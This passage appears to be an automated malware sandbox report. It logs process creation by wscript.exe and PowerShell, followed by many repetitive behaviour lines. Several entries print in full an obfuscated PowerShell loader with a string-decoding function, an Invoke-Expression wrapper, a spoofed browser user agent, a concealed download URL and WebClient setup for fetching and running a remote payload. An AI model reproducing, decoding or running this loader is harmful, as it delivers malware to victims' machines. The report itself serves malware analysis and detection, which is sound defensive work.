ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,Jump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAC135479 push ebp; iretd 15_2_00007FFAAC135538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_04A8EC78 pushfd ; retf 19_2_04A8EC79
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_04A817DF push ebx; ret 19_2_04A8189A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_04A8188C push ebx; ret 19_2_04A8189A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_076C30AB push dword ptr [ebp+ebx-75h]; iretd 19_2_076C30B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_076C1D28 push eax; mov dword ptr [esp], ecx19_2_076C21B4
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
